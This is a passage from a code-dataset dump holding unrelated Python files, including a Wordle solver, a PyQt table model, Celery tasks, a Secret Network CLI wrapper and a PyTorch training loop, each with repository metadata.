score_event(truth, submission):\n tracks = _analyze_tracks(truth, submission)\n purity_rec = np.true_divide(tracks['major_nhits'], tracks['nhits'])\n purity_maj = np.true_divide(tracks['major_nhits'], tracks['major_particle_nhits'])\n good_track = (0.5 < purity_rec) & (0.5 < purity_maj)\n return tracks['major_weight'][good_track].sum()","repo_name":"xkuang/KDD-2019-Hands-on","sub_path":"2_clustering/gnn_utils.py","file_name":"gnn_utils.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"23054201632","text":"import random\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\n\n# TODO: KEEP TRACK OF SCORE (CSV FILE?? date, final_guess, total score (n/5)\n# TODO: WHEN EVALUATING LETTERS, SEE IF ITS ALREADY IN A CATEGORY.. WILL HELP WITH GUESSING.\n# TODO: QUIT DRIVER IF RUN OUT OF GUESS WORDS\n# TODO: QUIT DRIVER IF COULD NOT GUESS WORD\n\n\nclass WordleDriver:\n\n def __init__(self):\n self.service = Service(ChromeDriverManager().install())\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--headless\")\n self.driver = webdriver.Chrome(service=self.service, options=chrome_options)\n self.url = 'https://www.nytimes.com/games/wordle/index.html'\n self.driver.get(self.url)\n self.game_app = self.expand_shadow_element(self.driver.find_element(By.TAG_NAME, \"game-app\"))\n self.game_rows = self.game_app.find_elements(By.TAG_NAME, \"game-row\")\n time.sleep(2)\n self.close_instructions()\n\n def close_instructions(self):\n root2 = self.expand_shadow_element(self.game_app.find_element(By.TAG_NAME, \"game-modal\"))\n close_icon = root2.find_element(By.CSS_SELECTOR, 'div.close-icon')\n close_icon.click()\n\n def expand_shadow_element(self, element):\n shadow_root = self.driver.execute_script('return arguments[0].shadowRoot', element)\n return shadow_root\n\n def get_keyboard(self):\n keyboard = self.game_app.find_element(By.TAG_NAME, \"game-keyboard\")\n keyboard_shadow = self.expand_shadow_element(keyboard)\n letters = keyboard_shadow.find_elements(By.TAG_NAME, 'button')\n\n return letters\n\n def get_tiles(self, game_row):\n game_row_shadow = self.expand_shadow_element(game_row)\n tile_elements = game_row_shadow.find_elements(By.TAG_NAME, \"game-tile\")\n tiles = []\n\n for tile in tile_elements:\n tiles.append(self.expand_shadow_element(tile))\n\n return tiles\n\n\nclass WordleSolver(WordleDriver):\n\n def __init__(self, five_letter_words: list):\n super().__init__()\n self.common_five_letter_words = [\n 'FRAME',\n 'GRAZE',\n 'PAINT',\n 'GOURD',\n 'SWING',\n 'AUDIO',\n 'ARISE',\n 'WINDY'\n ]\n self.five_letter_words = five_letter_words\n self.correct_word = [\"_\", \"_\", \"_\", \"_\", \"_\"]\n self.letters_absent = []\n self.letters_present = {}\n self.guesses = []\n self.i_row = 0\n\n def solve(self):\n guess = \"_____\"\n\n while self.i_row < len(self.game_rows) and guess is not None:\n print(f\"Guess # {self.i_row + 1}\")\n print(f\"Length of valid five letter words: {len(self.five_letter_words)}\")\n print(f\"Letters absent: {', '.join(self.letters_absent)}\")\n print(f\"Letters present: {', '.join(self.letters_present.keys())}\")\n print(f\"Valid words: {', '.join(self.five_letter_words)}\")\n guess = self.new_guess()\n print(f\"Guess word: {guess}\")\n self.input_guess(guess)\n print(\"\")\n\n if \"_\" not in self.correct_word:\n print(f\"You won!\\nCorrect word: {''.join(self.correct_word)}\")\n self.driver.quit()\n break\n self.driver.quit()\n\n def new_guess(self):\n if len(self.guesses) == 0:\n guess = random.choice(self.common_five_letter_words)\n\n else:\n try:\n guess = random.choice(self.five_letter_words)\n except IndexError:\n print(f\"Looks like you've run out guesses. \\nLast guessed word: {self.guesses[-1]}\")\n print(f\"Correct word structure: {''.join(self.correct_word)}\")\n guess = None\n\n return guess\n\n def input_guess(self, guess):\n keyboard = self.get_keyboard()\n\n for letter in guess:\n for key in keyboard:\n if key.text == letter:\n key.click()\n\n for key in keyboard:\n if key.text == \"ENTER\":\n key.click()\n time.sleep(2.5)\n break\n\n if self.word_is_valid():\n self.i_row = self.i_row + 1\n self.guesses.append(guess)\n self.evaluate_guess()\n self.five_letter_words.remove(guess)\n self.remove_invalid_words()\n\n else:\n self.five_letter_words.remove(guess)\n print(\"Invalid Guess Word\")\n for key in keyboard:\n # Find the backspace\n if key.text == \"\":\n for _ in list(range(5)):\n key.click()\n time.sleep(0.2)\n break\n\n def word_is_valid(self):\n valid = True\n tiles = self.get_tiles(self.game_rows[self.i_row])\n\n for tile in tiles:\n tile_div = tile.find_element(By.TAG_NAME, \"div\")\n\n if tile_div.get_attribute(\"data-state\") == \"tbd\":\n valid = False\n else:\n continue\n return valid\n\n def evaluate_guess(self):\n tiles = self.get_tiles(self.game_rows[self.i_row - 1])\n\n # Get the evaluations from the tiles\n for index, tile in enumerate(tiles):\n tile_div = tile.find_element(By.TAG_NAME, \"div\")\n evaluation = tile_div.get_attribute(\"data-state\")\n letter = tile_div.text.upper()\n\n if evaluation == \"absent\":\n self.letters_absent.append(letter)\n\n elif evaluation == \"present\":\n self.letters_present[letter] = index\n\n elif evaluation == \"correct\":\n self.correct_word[index] = letter\n\n print(f\"Correct word: {''.join(self.correct_word)}\")\n\n def find_invalid_words(self):\n words_to_remove = []\n\n for word in self.five_letter_words:\n # Check if matches the correct word\n for i in list(range(5)):\n if self.correct_word[i] == \"_\":\n continue\n elif self.correct_word[i] == word[i]:\n continue\n else:\n words_to_remove.append(word)\n\n if word in words_to_remove:\n continue\n\n # Check if letter is truly absent and in word:\n for letter in self.letters_absent:\n\n if letter in word:\n if letter in self.correct_word:\n if self.correct_word.index(letter) == word.index(letter):\n continue\n else:\n words_to_remove.append(word)\n elif letter in self.letters_present.keys():\n continue\n else:\n words_to_remove.append(word)\n else:\n continue\n\n if word in words_to_remove:\n continue\n\n # Check if letter present is in word\n for letter in self.letters_present.keys():\n if letter in word:\n if self.letters_present[letter] == word.index(letter):\n words_to_remove.append(word)\n else:\n words_to_remove.append(word)\n\n if word in words_to_remove:\n continue\n\n return words_to_remove\n\n def remove_invalid_words(self):\n\n words_to_remove = self.find_invalid_words()\n\n for word in words_to_remove:\n try:\n self.five_letter_words.remove(word)\n except ValueError:\n continue\n\n\nif __name__ == \"__main__\":\n from english_words import english_words_lower_set\n\n five_letter_word = []\n correct_word = {}\n incorrect_placement = {}\n\n special_char = \"*-'[{]}\\|!^&()%$#,.?/><\"\n # Only use 5 letter words\n for words in english_words_lower_set:\n if len(words) == 5:\n for char in special_char:\n if char in words:\n break\n elif char == special_char[-1]:\n five_letter_word.append(words.upper())\n else:\n continue\n five_letter_word.append(\"LOWLY\")\n five_letter_word.append(\"FEWER\")\n\n wordle = WordleSolver(five_letter_word)\n wordle.solve()\n","repo_name":"canasmh/WordleSolver","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":8500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2105565531","text":"# Copyright (c) 2011-2013, ImageCat Inc.\n#\n# This program is free software: you can redistribute it and/or modify \n# it under the terms of the GNU Affero General Public License as published by \n# the Free Software Foundation, either version 3 of the License, or \n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, \n# but WITHOUT ANY WARRANTY; without even the implied warranty of \n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License \n# along with this program. If not, see .\r\n#\n\"\"\"\r\ndialog for editing mapping scheme branches\r\n\"\"\"\r\nfrom PyQt4.QtCore import Qt, QVariant, QString, QAbstractTableModel, QModelIndex\r\nfrom ui.helper.common import build_attribute_tooltip\r\n\r\nclass MSLeavesTableModel(QAbstractTableModel):\r\n \"\"\"\r\n table model supporting visualization of node in mapping scheme tree\r\n \"\"\"\r\n def __init__(self, values, headers, formats, parser, valid_codes):\r\n \"\"\" constructor \"\"\"\r\n super(MSLeavesTableModel, self).__init__()\r\n\r\n self.headers = headers\n self.formats= formats\r\n self.parser=parser\r\n self.valid_codes=valid_codes\n self.values = values\n self.do_sort(sortIndex=0) \r\n \r\n def columnCount(self, parent):\r\n \"\"\" only three columns exist. always return 3 \"\"\"\r\n return len(self.headers)\r\n\r\n def rowCount(self, parent):\r\n \"\"\" number of rows same as number of siblings \"\"\"\r\n return len(self.values) \r\n\r\n def headerData(self, section, orientation, role):\r\n \"\"\" return data to diaply for header row \"\"\" \r\n if role == Qt.DisplayRole: \r\n if orientation == Qt.Horizontal:\r\n return QString(self.headers[section][0])\r\n else:\r\n # no vertical header\r\n return QVariant()\r\n elif role == Qt.ToolTipRole: \r\n return QString(self.headers[section][1])\r\n else: \r\n return QVariant()\r\n \r\n def data(self, index, role):\r\n \"\"\" return data to be displayed in a cell \"\"\"\n row, col = index.row(), index.column() \r\n value = self.values[row][col] \n if role == Qt.DisplayRole:\r\n if value is not None:\n return QString(self.formats[col] % value)\n else:\n return QVariant(\"\")\n elif role == Qt.ToolTipRole:\r\n # construct data for display in tooltip \r\n if (index.column() == 0): \r\n if value is not None:\r\n return build_attribute_tooltip(self.valid_codes, self.parser.parse(value))\r\n else:\r\n return QVariant(\"\")\r\n elif role == Qt.UserRole: \n return index.internalPointer()\n else:\r\n return QVariant()\r\n \n def index(self, row, column, parent):\n \"\"\" provide index to data given a cell \"\"\"\n try:\n node = self.values[row][len(self.headers)]\n return self.createIndex(row, column, node)\n except:\n return QModelIndex() \n \r\n def flags(self, index):\r\n \"\"\" cell condition flag \"\"\"\r\n # NOTE: \r\n # ItemIsEditable also required data() and setData() function\r\n return Qt.ItemIsEnabled | Qt.ItemIsSelectable\r\n\r\n def sort(self, ncol, order):\r\n \"\"\" sort table \"\"\"\r\n if ncol < 0 or ncol > len(self.headers):\r\n return\r\n self.layoutAboutToBeChanged.emit() \r\n self.do_sort(sortIndex=ncol, reverse_sort=order==Qt.DescendingOrder)\r\n self.layoutChanged.emit()\r\n\n # internal helper methods\n ############################### \r\n def do_sort(self, sortIndex = 0, reverse_sort=False):\n def sort_key(row):\n return row[sortIndex] \r\n self.values.sort(key=sort_key, reverse=reverse_sort)\r\n ","repo_name":"ImageCatInc/sidd","sub_path":"ui/helper/ms_leaves_table.py","file_name":"ms_leaves_table.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3684178584","text":"class Solution:\n def getSkyline(self, buildings: List[List[int]]) -> List[List[int]]:\n \n res = []\n \n # Sort buildings by their x-coordinates of the left edges\n buildings.sort(key=lambda b: b[0])\n \n active_buildings = [] # sorted by x-coordinate of the right edge\n max_height = 0 # current maximum height (for active buildings)\n \n def updateMax(bs): # update max height\n maxH = 0\n for b in bs:\n if b[2] > maxH:\n maxH = b[2]\n return maxH\n \n for building in buildings:\n \n i, n = 0, len(active_buildings)\n \n while active_buildings and active_buildings[0][1] < building[0]: # end before building?\n \n ending_building = active_buildings.pop(0)\n \n new_max = updateMax(active_buildings)\n \n if new_max != max_height: # update max_height and add the new point\n max_height = new_max\n res.append([ending_building[1], max_height, 1]) # 1 for ending\n \n if max_height < building[2]: # new building higher\n max_height = building[2]\n res.append([building[0], building[2], 0]) # add beginning (0 for beginning)\n \n # insert building into active_buildings (preserving the order)\n i, n = 0, len(active_buildings)\n while i < n and active_buildings[i][1] < building[1]:\n i += 1\n active_buildings.insert(i, building)\n \n while active_buildings:\n ending_building = active_buildings.pop(0)\n\n new_max = updateMax(active_buildings)\n if new_max != max_height: # update max_height and add the new point\n max_height = new_max\n res.append([ending_building[1], max_height, 1]) # for ending\n \n # Erase false duplicates ([[1,2,1],[1,2,2],[1,2,3]])\n print(res)\n new_res = []\n \n j, p = 0, len(res)\n \n while j < p:\n \n cnt = 1\n c_max = res[j][1]\n \n while j + cnt < p and res[j][0] == res[j+cnt][0]:\n if res[j][2] == 0:\n c_max = max(c_max, res[j+cnt][1])\n else:\n c_max = min(c_max, res[j+cnt][1]) # ending so take the minimum\n cnt += 1\n \n new_res.append([res[j][0], c_max])\n \n j += cnt\n \n return new_res","repo_name":"jathurchan/divecode.io","sub_path":"2020-2022/top-interview-questions/hard/218_TheSkylineProblem.py","file_name":"218_TheSkylineProblem.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1341941868","text":"def czy_istnieje_prostokat(dane):\n for i in range(len(dane) - 3):\n for j in range(i + 1, len(dane) - 2):\n for k in range(j + 1, len(dane) - 1):\n for l in range(k + 1, len(dane)):\n x1, y1 = dane[i]\n x2, y2 = dane[j]\n x3, y3 = dane[k]\n x4, y4 = dane[l]\n\n # Sprawdź czy punkty tworzą prostokąt\n if (x1 == x2) and (x3 == x4) and (y1 == y3) and (y2 == y4) and (x1 != x3) and (y1 != y2):\n # Sprawdź czy są równej długości\n if (y2 - y1) == (y4 - y3) and (x3 - x1) == (x4 - x2) and (y2 - y1) != (x4 - x2):\n check = 0\n for xd in range(i+1,l-1):\n if(xd !=j and xd !=k):\n if(x1 < dane[xd][0] < x3) and (y1 < dane[xd][1] < y2):\n check = -1\n break\n if(check == 0):\n return True\n\n return False\n\n# Przykładowe dane\ndane = [(0, 0), (0, 2), (3, 0), (3, 2), (1, 1), (2, 1), (1, 3), (2, 3), (4,5), (4,7), (5,5),(5,7)]\n\n# Wywołanie funkcji\ndane.sort()\nwynik = czy_istnieje_prostokat(dane)\nprint(wynik) ","repo_name":"karmiski/WDI","sub_path":"laboratorium 5/zadanie6.xd.py","file_name":"zadanie6.xd.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20722493320","text":"import os\n\nfrom apiclient import discovery\nfrom httplib2 import Http\nfrom oauth2client import client\n\n\ncredential_json = os.environ.get(\"CREDENTIALS\")\ncreds = client.OAuth2Credentials.from_json(credential_json)\nservice = discovery.build('sheets', 'v4', http=creds.authorize(Http()))\n\n\ndef grab_column(spreadsheetid, column, sheetname=\"\"):\n if sheetname != \"\":\n sheetname = sheetname + \"!\"\n\n column_values = service\\\n .spreadsheets()\\\n .values()\\\n .get(spreadsheetId=spreadsheetid, range='{}{}'.format(sheetname, column + \":\" + column))\\\n .execute()\n\n return column_values.get('values')\n\n\ndef update_cell(spreadsheetid, cell, body):\n service.spreadsheets().values().update(spreadsheetId=spreadsheetid, range=cell,\n valueInputOption='USER_ENTERED', body=body).execute()\n","repo_name":"shadd-anderson/google-spreadsheet-updater","sub_path":"spreadsheet_update.py","file_name":"spreadsheet_update.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17765712653","text":"import sys\r\nfrom collections import deque\r\n\r\nN = int(sys.stdin.readline())\r\n\r\nqueue = deque()\r\ndiscard = deque()\r\n\r\nfor i in range(1, N + 1):\r\n queue.append(i)\r\n\r\nfor i in range(N - 1):\r\n discard.append(queue.popleft())\r\n pop_value = queue.popleft()\r\n queue.append(pop_value)\r\n\r\ndiscard.append(queue.popleft())\r\n\r\nfor _ in range(N):\r\n result_value = discard.popleft()\r\n print(f\"{result_value}\", end=\" \")\r\n","repo_name":"heegane/baekjoon","sub_path":"백준/Silver/2161. 카드1/카드1.py","file_name":"카드1.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73385707252","text":"import torch\nfrom torch.nn import Module\nfrom torch.optim import Adam\nfrom torch.optim import Optimizer\nfrom util.shift_reduce_utils import binary_tree_to_sr, sr_to_tensor, as_batch\nfrom random import shuffle\nfrom inference_loops.point import Point\n\n\ndef _make_batch(data_slice, to_device):\n values = [to_device(torch.tensor([value])) for (value, _) in data_slice]\n values_batch = torch.cat(values)\n seqs = [seqs for (_, seqs) in data_slice]\n\n max_len = max([len(s[0]) for s in seqs])\n #padding with shift. The corresponding label should never affect gradient so should not matter\n #So we take 0.\n padding_label = torch.LongTensor([0])\n padded_seqs = [(((max_len-len(s[0]))*['s'] + s[0]), (max_len-len(s[0]))*[padding_label] + s[1]) for s in seqs]\n\n tensors = [sr_to_tensor(*s, to_device) for s in padded_seqs]\n batch = as_batch(tensors)\n\n return Point(batch, values_batch)\n\n\nclass BatchPerBatchLoop:\n def __init__(self, data_points, tree_model: Module, loss: Module, to_device, verbose: bool=True, batch_size=10,\n optimizer_factory: Optimizer = Adam, *optimizer_args, **optimizer_kwargs):\n self.data_points = data_points\n self._data_points = [(point.value, binary_tree_to_sr(point.tree)) for point in self.data_points]\n self.n_data = len(self.data_points)\n self.tree_model = tree_model\n self.loss = loss\n self.to_device = to_device\n self.optimizer = optimizer_factory(self.tree_model.parameters(), *optimizer_args, **optimizer_kwargs)\n self.batch_size = batch_size\n self.verbose = verbose\n\n def step(self, epoch=0):\n cumulated_loss = 0.\n epoch_loss = 0.\n instances = self._get_data_iterable(self.batch_size)\n for (i, instance) in instances:\n self.optimizer.zero_grad()\n\n value = self.tree_model(instance.tree)\n loss_and_grad = self.loss(value, instance.value)\n loss_and_grad.backward()\n\n self.optimizer.step()\n\n loss_value = loss_and_grad.item()\n cumulated_loss += loss_value\n epoch_loss += loss_value\n\n if self.verbose and i % 10 == 0:\n print(\"\\t[epoch %d, batch number %d] mean loss over the last 10 batches: %f\" % (epoch, i, cumulated_loss / 10))\n cumulated_loss = 0.\n\n if self.verbose:\n print(\"Epoch %d mean loss: %f\" % (epoch, epoch_loss/i))\n\n def train(self, epochs : int):\n for epoch in range(1, epochs+1):\n self.step(epoch)\n\n def _get_data_iterable(self, N):\n shuffle(self._data_points)\n n_batches = len(self._data_points) // N + (len(self._data_points) > 1)\n for i in range(n_batches):\n if i*N < self.n_data:\n yield (i+1, _make_batch(self._data_points[i*N:(i+1)*N], self.to_device))\n\n\n","repo_name":"avena554/listops_sandbox","sub_path":"inference_loops/batch_per_batch_loop.py","file_name":"batch_per_batch_loop.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71182303733","text":"from WebBlog.celery_tasks import app\nfrom .models import Blog\nfrom django_redis import get_redis_connection\nfrom django.core import mail\nfrom django.conf import settings\nimport logging\nimport os, django\n\nlog = logging.getLogger(\"django\")\n\n\n@app.task(name='update_count') # name表示设置任务的名称,如果不填写,则默认使用函数名做为任务名\ndef update_count():\n conn = get_redis_connection('default')\n blogs = []\n read_dict = conn.hgetall('read_count')\n for item in read_dict:\n blog_id = int(item.decode())\n # blog_id = int(item.split(':')[0])\n blog = Blog.objects.filter(pk=blog_id).first()\n blog.read_count += int(read_dict[item].decode())\n blogs.append(blog)\n conn.delete('read_count')\n Blog.objects.bulk_update(blogs, ['read_count'])\n\n\n@app.task\ndef send_email_celery(subject, message, email):\n mail.send_mail(\n subject=subject,\n message=message,\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=[email]\n )\n\n# @app.task\n# def forget_password(csrftoken, email):\n#\n# mail.send_mail(\n# subject='找回密码',\n# message='请点击下面链接重置您的账户密码:{}/{}/'.format(settings.SERVER_NAME + \"/forget\",csrftoken),\n# from_email=settings.EMAIL_HOST_USER,\n# recipient_list=[email]\n# )\n","repo_name":"yzwjy25/Django-Blog","sub_path":"web/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37384119286","text":"from RagnarokDatabase.models import MVP\nimport csv\n\ndef run():\n fhand= open('RagnarokDatabase/scripts/Lista MVP.csv')\n reader = csv.reader(fhand)\n next(reader) # Avanza más allá de las cabeceras\n\n # Aquí el ejemplo borra los items con app.models.all().delete()\n\n for row in reader:\n print(row)\n #b, created = MVP.objects.get_or_create(name=row[1])\n c = MVP(name=row[0])\n c.save()\n print('MVP Database Update Done!')","repo_name":"RomeroRodriguezD/RagnarokMVPKillsDatabase","sub_path":"RagnarokDatabase/scripts/csvreaderexample.py","file_name":"csvreaderexample.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"22950754901","text":"import os\nimport json\nimport subprocess\nfrom shutil import copyfile\nfrom subprocess import PIPE, run as subprocess_run\nfrom typing import List, Dict\n\nfrom src.contracts.secret.secret_contract import swap_json\nfrom src.util.config import Config\nfrom src.util.logger import get_logger\n\nlogger = get_logger(logger_name=\"SecretCLI\")\n\n\ndef query_encrypted_error(tx_hash: str):\n cmd = ['secretcli', 'q', 'compute', 'tx', tx_hash]\n resp = run_secret_cli(cmd)\n\n resp_json = json.loads(resp)\n return resp_json[\"output_error\"]\n\n\ndef sign_tx(unsigned_tx_path: str, multi_sig_account_addr: str, account_name: str):\n cmd = ['secretcli', 'tx', 'sign', unsigned_tx_path, '--signature-only', '--multisig',\n multi_sig_account_addr, '--from', account_name]\n\n return run_secret_cli(cmd)\n\n\ndef multisig_tx(unsigned_tx_path: str, multi_sig_account_name: str, *signed_tx):\n cmd = ['secretcli', 'tx', 'multisign', unsigned_tx_path, multi_sig_account_name] + list(signed_tx)\n\n return run_secret_cli(cmd)\n\n\ndef create_unsigned_tx(secret_contract_addr: str, transaction_data: Dict, chain_id: str, enclave_key: str,\n code_hash: str, multisig_acc_addr: str) -> str:\n cmd = ['secretcli', 'tx', 'compute', 'execute', secret_contract_addr, f\"{json.dumps(transaction_data)}\",\n '--generate-only', '--chain-id', f\"{chain_id}\", '--enclave-key', enclave_key, '--code-hash',\n code_hash, '--from', multisig_acc_addr]\n return run_secret_cli(cmd)\n\n\ndef broadcast(signed_tx_path: str) -> str:\n cmd = ['secretcli', 'tx', 'broadcast', signed_tx_path]\n return run_secret_cli(cmd)\n\n\ndef decrypt(data: str) -> str:\n cmd = ['secretcli', 'query', 'compute', 'decrypt', data]\n return run_secret_cli(cmd)\n\n\ndef query_scrt_swap(nonce: int, contract_addr: str) -> str:\n query_str = swap_json(nonce)\n cmd = ['secretcli', 'query', 'compute', 'query', contract_addr, f\"{query_str}\"]\n p = subprocess_run(cmd, stdout=PIPE, stderr=PIPE, check=True)\n return p.stdout.decode()\n\n\ndef query_tx(tx_hash: str):\n cmd = ['secretcli', 'query', 'tx', tx_hash]\n return run_secret_cli(cmd)\n\n\ndef query_data_success(tx_hash: str):\n \"\"\" This command is used to test success of transactions - so we can safely ignore any errors and assume in any case\n that means the tx isn't on-chain\n \"\"\"\n cmd = ['secretcli', 'query', 'compute', 'tx', tx_hash]\n try:\n resp = run_secret_cli(cmd)\n return json.loads(json.loads(resp)[\"output_data_as_string\"])\n except (RuntimeError, json.JSONDecodeError, KeyError):\n return {}\n\n\ndef run_secret_cli(cmd: List[str]) -> str:\n \"\"\"\n\n \"\"\"\n try:\n logger.debug(f'Running command: {cmd}')\n p = subprocess.run(cmd, stdout=PIPE, stderr=PIPE, check=True)\n except subprocess.CalledProcessError as e:\n logger.error(f'Failed: stderr: {e.stderr.decode()}, stdout: {e.stdout.decode()}')\n raise RuntimeError(e.stdout.decode()) from None\n\n logger.debug('Success')\n return p.stdout.decode()\n\n\ndef configure_secretcli(config: Config): # pylint: disable=too-many-statements\n\n # check if cli is already set up:\n cmd = ['secretcli', 'keys', 'list']\n result = run_secret_cli(cmd)\n if result.strip() != '[]': # sometimes \\n is added to the result\n logger.info(f\"{result}\")\n logger.info(\"CLI already set up\")\n return\n\n cmd = ['secretcli', 'config', 'output', 'json']\n\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'indent', 'true']\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'trust-node', 'true']\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'node', config['secret_node']]\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'chain-id', config['chain_id']]\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'keyring-backend', 'test']\n run_secret_cli(cmd)\n\n # set up multisig\n signers = []\n for i, key in enumerate(config[\"secret_signers\"]):\n cmd = ['secretcli', 'keys', 'add', f'ms_signer{i}', f'--pubkey={key}']\n signers.append(f'ms_signer{i}')\n run_secret_cli(cmd)\n\n cmd = ['secretcli', 'keys', 'add', f'{config[\"multisig_key_name\"]}', f\"--multisig={','.join(signers)}\",\n '--multisig-threshold', f'{config[\"signatures_threshold\"]}']\n run_secret_cli(cmd)\n\n logger.debug(f'importing private key from {config[\"secret_key_file\"]} with name {config[\"secret_key_name\"]}')\n\n # import key\n key_path = os.path.join(f'{config[\"KEYS_BASE_PATH\"]}', f'{config[\"secret_key_file\"]}')\n cmd = ['secretcli', 'keys', 'import', f'{config[\"secret_key_name\"]}',\n f'{key_path}']\n process = subprocess.Popen(cmd,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n inputdata = config[\"secret_key_password\"]\n _, stderrdata = process.communicate(input=(inputdata+\"\\n\").encode())\n\n if stderrdata:\n logger.error(f\"Error importing secret key: {stderrdata}\")\n raise EnvironmentError\n\n logger.debug(\"copying transaction key..\")\n # copy transaction key from shared location\n src_key_path = os.path.join(f'{config[\"KEYS_BASE_PATH\"]}', 'id_tx_io.json')\n dst_key_path = os.path.join(f'{config[\"SECRETCLI_HOME\"]}', 'id_tx_io.json')\n copyfile(src_key_path, dst_key_path)\n\n # test configuration\n cmd = ['secretcli', 'query', 'account', config['multisig_acc_addr']]\n run_secret_cli(cmd)\n\n #\n cmd = ['secretcli', 'query', 'register', 'secret-network-params']\n run_secret_cli(cmd)\n","repo_name":"levackt/EthereumBridge","sub_path":"src/util/secretcli.py","file_name":"secretcli.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29349417644","text":"def add(a,b):\n \"\"\"\n Realiza a soma de dois numeros\n @author: Marcos Vinicius\n \"\"\"\n return a+b\n\ndef maior(a,b):\n \"\"\"\n Realiza a comparacao entre dois numeros\n @author: Marcos Vinicius\n \"\"\"\n if a>b:\n return a\n return b\n\ndef soma(lista, x=0):\n \"\"\"\n Realiza a soma da lista com o elemento x\n @author: Marcos Vinicius\n \"\"\"\n somador = 0\n\n for elemento in lista:\n somador+=elemento\n \n return somador+x\n\ndef media(lista):\n \"\"\"\n Realiza a media da lista\n @author: Marcos Vinicius\n \"\"\"\n contador=0 \n somador=0\n\n for elemento in lista:\n somador+=elemento\n contador+=1\n\n return (somador/contador) \ndef valoresIguais(lista1, lista2):\n \"\"\"\n Realiza a comparacao entre duas listas\n retorna os elementos iguais \n @author: Marcos Vinicius\n \"\"\"\n retornoLista = []\n for elLista1 in lista1:\n for elLista2 in lista2:\n if elLista1==elLista2:\n retornoLista.append(elLista1)\n return retornoLista\n\ndef indice_prim_valor_igual(lista1,lista2):\n \"\"\"\n Realiza a comparacao entre duas listas\n retorna o indice do elemento igual \n @author: Marcos Vinicius\n \"\"\"\n x = -1\n for elLista1 in lista1:\n for elLista2 in lista2:\n if elLista1==elLista2:\n x = lista1.index(elLista1)\n if x >= 0:\n return x\n \n return None\n\nif __name__ == \"__main__\":\n x = add(2,3)\n print(\"Soma: \"+str(x))\n\n #Maior \n x = maior(2,3)\n print(\"Maior: \" +str(x))\n\n #Soma numeros\n listaDeNumeros = [1,2,3,4,5,6]\n x = soma(listaDeNumeros, 6)\n print(\"Soma da lista: \" +str(x))\n\n #Media numeros\n listaDeNumeros = [1,2,3,6]\n x = media(listaDeNumeros)\n print(\"Media: \" + str(x))\n\n #Valores iguais\n listaDeNumeros1 = [1,5,7,8]\n listaDeNumeros2 = [5,8,7,10,11]\n listaIguais = []\n listaIguais = valoresIguais(listaDeNumeros1, listaDeNumeros2)\n print(\"Iguais: \" + str(listaIguais))\n\n #Indice primeiro valor igual\n listaDeNumeros1 = [13,9,3,1,14]\n listaDeNumeros2 = [5,8,7,10,11]\n indiceIgual = indice_prim_valor_igual(listaDeNumeros1,listaDeNumeros2)\n print(\"Indice: \" + str(indiceIgual))","repo_name":"MarVinReisSantos/exercicios-frontend-CEFET","sub_path":"4 Bimestre/Exercicio 1/codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15750337750","text":"from .from_list_connector import FromListConnector\nimport os\nimport numpy\nfrom six import string_types\nfrom pyNN.connectors import FromFileConnector as PyNNFromFileConnector\nfrom pyNN.recording import files\n\n\nclass FromFileConnector(FromListConnector, PyNNFromFileConnector):\n # pylint: disable=redefined-builtin\n __slots__ = [\"_file\"]\n\n def __init__(\n self, file, # @ReservedAssignment\n distributed=False, safe=True, callback=None, verbose=False):\n self._file = file\n if isinstance(file, string_types):\n real_file = self.get_reader(file)\n try:\n conn_list = self._read_conn_list(real_file, distributed)\n finally:\n real_file.close()\n else:\n conn_list = self._read_conn_list(file, distributed)\n\n column_names = self.get_reader(self._file).get_metadata().get(\n 'columns')\n if column_names is not None:\n column_names = [column for column in column_names\n if column not in (\"i\", \"j\")]\n\n # pylint: disable=too-many-arguments\n FromListConnector.__init__(\n self, conn_list, safe=safe, verbose=verbose,\n column_names=column_names, callback=callback)\n PyNNFromFileConnector.__init__(\n self, file=file, distributed=distributed, safe=safe,\n callback=callback)\n\n def _read_conn_list(self, the_file, distributed):\n if not distributed:\n return the_file.read()\n filename = 